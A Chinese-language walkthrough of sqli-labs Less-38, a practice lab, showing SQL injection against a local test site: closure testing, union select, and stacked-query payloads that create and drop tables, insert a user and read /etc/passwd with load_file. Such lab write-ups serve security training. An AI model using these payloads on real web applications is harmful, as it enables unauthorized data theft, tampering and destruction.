sqli-labs (less-38)sqli-labs (less-38)

sqli-labs (less-38)

进入38关，输入id=1

http://127.0.0.1/sql1/Less-38/?id=1'

根据错误信息判断闭合方式为’–+，并且为字符型注入

确定回显位置

http://127.0.0.1/sql1/Less-38/?id=-1' union select 1,2,3--+

这里发现这难道跟less-1难道不是一模一样吗，所以这里我们不使用union注入，我们使用另一种注入方式：堆叠注入

堆叠注入攻击

堆叠查询注入攻击可以执行多条语句，多语句之间以分号隔开。堆叠查询注入就是利用这个特点，在第二个SQL语句中构造自己的要执行的语句
新建一个表select * from users;create table A like users;
删除创建的A表select * from users;drop table test;
查询数据select * from users;select B,C,D;
加载文件select * from users;select load_file('/etc/passwd');
增加一条数据select * from users;insert into users values(18,'zhong','zhong');

在security库下增加一个表

http://127.0.0.1/sql1/Less-38/?id=1'; create table test like users;–+

没有任何反应，我们进入数据库看看我们的表是否创建成功

删除test表

http://127.0.0.1/sql1/Less-38/?id=1'; drop table test;–+

成功删除

创建一个新用户

http://127.0.0.1/sql1/Less-38/?id=1'; insert into users values(18,'icepeak','icepeak');–+

创建成功

最后

以上就是敏感帽子为你收集整理的sqli-labs (less-38)sqli-labs (less-38)的全部内容，希望文章能够帮你解决sqli-labs (less-38)sqli-labs (less-38)所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。